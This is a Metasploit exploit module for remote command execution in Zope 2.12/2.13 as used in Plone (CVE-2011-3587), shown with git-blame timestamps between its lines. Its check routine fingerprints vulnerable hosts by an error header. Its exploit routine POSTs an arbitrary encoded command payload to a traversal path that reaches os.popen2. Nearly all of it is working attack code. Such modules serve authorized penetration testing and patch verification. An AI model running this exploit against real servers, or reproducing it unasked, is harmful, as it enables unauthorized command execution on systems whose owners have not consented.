2011-12-27 00:59:26 -06:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-12-27 00:59:26 -06:00
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-08-30 16:28:54 -05:00
|
|
|
Rank = ExcellentRanking
|
2011-12-27 00:59:26 -06:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
2011-12-27 00:59:26 -06:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
def initialize(info={})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'Plone and Zope XMLTools Remote Command Execution',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x
|
|
|
|
|
through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute
|
|
|
|
|
arbitrary commands via vectors related to the p_ class in OFS/misc_.py and
|
|
|
|
|
the use of Python modules.
|
2011-12-27 00:59:26 -06:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
2015-04-02 15:25:47 -05:00
|
|
|
'Unknown', # Plone Security Team, original vulnerability discovery
|
2013-08-30 16:28:54 -05:00
|
|
|
'Nick Miles', # Original exploit
|
|
|
|
|
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
|
|
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
['CVE', '2011-3587'],
|
2016-07-15 12:00:31 -05:00
|
|
|
['OSVDB', '76105'],
|
2013-08-30 16:28:54 -05:00
|
|
|
['EDB', '18262'],
|
|
|
|
|
['URL', 'http://plone.org/products/plone/security/advisories/20110928']
|
|
|
|
|
],
|
|
|
|
|
'Privileged' => false,
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Compat' =>
|
|
|
|
|
{
|
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
|
'RequiredCmd' => 'generic telnet perl ruby python',
|
|
|
|
|
}
|
|
|
|
|
},
|
2013-09-24 12:33:31 -05:00
|
|
|
'Platform' => %w{ linux unix },
|
2013-08-30 16:28:54 -05:00
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
|
'Targets' => [['Automatic',{}]],
|
|
|
|
|
'DisclosureDate' => 'Oct 04 2011',
|
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
|
))
|
2011-12-27 00:59:26 -06:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
Opt::RPORT(8080),
|
|
|
|
|
OptString.new('URI',[true, "The path to the Plone installation", "/"]),
|
2017-05-03 15:42:21 -05:00
|
|
|
])
|
2013-08-30 16:28:54 -05:00
|
|
|
register_autofilter_ports([ 8080 ])
|
|
|
|
|
end
|
2011-12-27 00:59:26 -06:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
def check
|
|
|
|
|
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
|
2011-12-27 00:59:26 -06:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
res = send_request_raw(
|
|
|
|
|
{
|
|
|
|
|
'uri' => uri
|
|
|
|
|
}, 25)
|
|
|
|
|
if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/)
|
2014-01-21 14:10:35 -06:00
|
|
|
return Exploit::CheckCode::Appears
|
2013-08-30 16:28:54 -05:00
|
|
|
end
|
|
|
|
|
# patched == zExceptions.NotFound
|
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
|
end
|
2011-12-27 00:59:26 -06:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
def exploit
|
|
|
|
|
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
|
2011-12-27 00:59:26 -06:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
send_request_cgi(
|
|
|
|
|
{
|
|
|
|
|
'method' => 'POST',
|
|
|
|
|
'uri' => uri,
|
|
|
|
|
'vars_post' =>
|
|
|
|
|
{
|
|
|
|
|
'cmd' => payload.encoded,
|
|
|
|
|
}
|
|
|
|
|
}, 0.5) # short timeout, we don't care about the response
|
|
|
|
|
end
|
2011-12-27 00:59:26 -06:00
|
|
|
end
|